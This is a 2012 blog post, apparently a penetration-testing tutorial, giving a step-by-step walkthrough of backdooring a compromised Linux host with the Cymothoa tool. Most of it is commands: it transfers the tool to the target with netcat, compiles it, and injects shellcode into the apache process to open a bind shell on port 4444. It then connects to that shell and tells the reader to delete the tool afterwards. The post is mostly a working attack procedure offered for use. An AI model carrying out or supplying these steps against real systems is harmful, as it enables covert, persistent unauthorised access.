Comments

Pages

Saturday, 15 September 2012

Backdooring with Cymothoa

Posted by at 16:29 Read our previous post
After logging into target machine, we need to create backdoor for accessing later. Now, I will share about backdooring with Cymothoa. Cymothoa can inject backdoor into process, so the backdoor running with another process.

For example, when some process running on system like apache or mysql. We can inject into this process.

process running
---------------------------------------------------------------------
PID                             App
---------------------------------------------------------------------
1028                          /usr/bin/apache2
1033                          /usr/bin/mysqld


                   (inject into apache)
Cymothoa ----------------------------> PID 1028
Now we can get access of backdoor via apache process.


OK, lets play the game....
We must upload cymothoa into target machine, I will compress it.

root@bt# tar -zcvf cymotho.tar.gz /pentest/backdoors/cymothoa


Using netcat to make target machine listen at port 1337
target@ubuntu# nc -l -p 1337 > cymothoa.tar.gz


Send cymothoa into target machine with netcat
root@bt# nc -w 1 192.168.56.101 1337 < cymothoa.tar.gz
* note 192.168.56.101 is IP address of target machine

Back into target machine and check the cymothoa.tar.gz, when upload successfully we can uncompress it.
target@ubuntu# tar -zxvf cymothoa.tar.gz

Now time for injecting the process.
target@ubuntu# cd cymothoa; make install;

Usage:

        cymothoa -p <pid> -s <shellcode_number> [options]
Main options:
        -p      process pid
        -s      shellcode number
        -l      memory region name for shellcode injection (default /lib/ld)
                see /proc/pid/maps...
        -h      print this help screen
        -S      list available shellcodes
Payload personalization options:
        -x      set the IP
        -y      set the port number
        -r      set the port number 2
        -z      set the username (3 bytes)
        -o      set the password (8 bytes)
        -i      set the interpreter (def /bin/bash)
        -c      set the script code (from cmd line)
        -F      do not fork parent process

I will inject into apache process, so I need to run this command:
target@ubuntu# ./cymothoa -p 1028 -s 0 -y 4444


Ok,lets check the backdoor with netcat
root@bt# nc -v 192.168.56.101 4444

Well done, we got access into backdoor...
Finally, you can delete the cymothoa file in target machine.

No comments:

Post a Comment

©2012 SECURITY is powered by Blogger - Template designed by Stramaxon - Best SEO Template